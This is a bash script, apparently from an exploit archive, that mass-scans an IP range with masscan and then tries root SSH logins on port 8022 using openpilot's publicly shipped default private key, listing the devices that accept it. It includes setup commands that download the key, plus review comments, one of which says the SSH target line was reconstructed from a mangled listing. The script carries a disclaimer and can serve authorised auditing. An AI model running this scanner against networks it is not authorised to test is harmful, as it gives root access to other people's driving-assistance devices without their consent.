Authored by Jeremy Brown

Openpilot ships with a default SSH key that, if it is not changed, can allow attackers remote access. This script port-scans a given range and attempts to log in to Openpilot SSH servers with the default key, which identifies the devices that still accept it.

#!/bin/bash
#
# openpilot-scan.sh
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# Checks for openpilot devices using the default SSH key
#
# Setup
# > apt-get install -y masscan && setcap cap_net_raw=ep /usr/bin/masscan
# > wget -q https://raw.githubusercontent.com/commaai/openpilot/master/tools/ssh/id_rsa
# > chmod 600 id_rsa
#
# Example
# > ./openpilot-scan.sh 10.100.100.1/24
#
# Disclaimer
# This script will port scan and attempt login to SSH servers which accept a
# given key. Use it at your own risk, no guarantees, only scan your own network
# or those that you have permission to scan. You assume full responsibility
# for any use or execution of these tools, authorized entry or otherwise actions.
#

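# --- Configuration -----------------------------------------------------------
# Private key offered to each host; the Setup notes above download openpilot's
# published default key to this path.
KEY="id_rsa"
# PCRE (used with `grep -P`) for a dotted-quad IPv4 address. The dots are
# escaped so that only a literal '.' separates the groups. An unescaped '.'
# matches any character, so unrelated digit runs on a log line (for example a
# port number followed by part of an address, or a long number on its own) are
# extracted as a bogus "address" and then probed, which can put hosts outside
# the requested range on the target list. Octet values (0-255) are not checked.
MATCH_IP='[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
MASSCAN_LOG="masscan.log"   # masscan list output (-oL)
SCAN_LOG="scan.log"         # addresses extracted from MASSCAN_LOG
FOUND_FILE="found.txt"      # hosts whose ssh exit status was not 255 (appended to)
SSH_PORT=8022               # port that is scanned and used for the SSH attempt
# NOTE(review): this reassigns the shell's own USER variable. USER is normally
# exported, so every child process started later in the script sees USER=root.
USER="root"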

# Exactly one argument is required: the range to scan (see Example above).
# Anything else prints the usage line and exits with status 1.
[ "$#" -eq 1 ] || {
  printf '%s\n' "usage: ./openpilot-scan.sh ra.n.g.e/24"
  exit 1
}

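# scan
# Sweep the requested range for hosts with SSH_PORT open; results are written
# to MASSCAN_LOG in masscan's list format (-oL). masscan's own output is
# discarded, so its exit status is the only failure signal. Stop on failure
# rather than go on to parse a MASSCAN_LOG left over from an earlier run, which
# could hold addresses outside the range given on this invocation.
if ! masscan --open -p "$SSH_PORT" -oL "$MASSCAN_LOG" "$1" >/dev/null 2>&1; then
  echo "error: masscan failed; refusing to use a possibly stale $MASSCAN_LOG" >&2
  exit 1
fi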

# parse
# Extract every substring of the masscan log that matches MATCH_IP, one per
# line, overwriting SCAN_LOG.
#   -o  print only the matched text
#   -h  no filename prefix
#   -P  Perl-compatible regular expression
grep -o -h -P "$MATCH_IP" "$MASSCAN_LOG" >"$SCAN_LOG"

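# check
# Offer KEY to every address in SCAN_LOG and record the hosts that accept it.
# Each host written to FOUND_FILE still accepts the default key and needs the
# key replaced.

# Without a readable key every attempt ends with status 255, and the run would
# wrongly report that no device accepts the default key.
if [ ! -r "$KEY" ]; then
  echo "error: key file '$KEY' not found or not readable" >&2
  exit 1
fi

while IFS= read -r IP; do
  # NOTE(review): the destination in the published listing was mangled and the
  # line continuations were lost; USER@IP is reconstructed from the USER
  # setting, which is otherwise unused.
  #
  # -o batchmode=yes              never prompt; fail instead
  # -o StrictHostKeyChecking=no   accept unknown host keys without asking (this
  #                               also adds each host to the known_hosts file)
  # -n                            keep ssh off the loop's stdin; otherwise a
  #                               successful login would consume the remaining
  #                               lines of SCAN_LOG, ending the loop early and
  #                               passing them to the remote shell as input
  # -T                            no pseudo-terminal
  ssh "${USER}@${IP}" \
    -p "$SSH_PORT" \
    -o batchmode=yes \
    -o StrictHostKeyChecking=no \
    -n -T -i "$KEY" >/dev/null 2>&1
  status=$?

  # ssh exits 255 when ssh itself failed (e.g. a connection or authentication
  # failure); any other value is the exit status of the remote session, which
  # means the login with KEY was accepted.
  if [ "$status" -ne 255 ]; then
    echo "$IP"
    echo "$IP" >>"$FOUND_FILE"
  fi
done <"$SCAN_LOG"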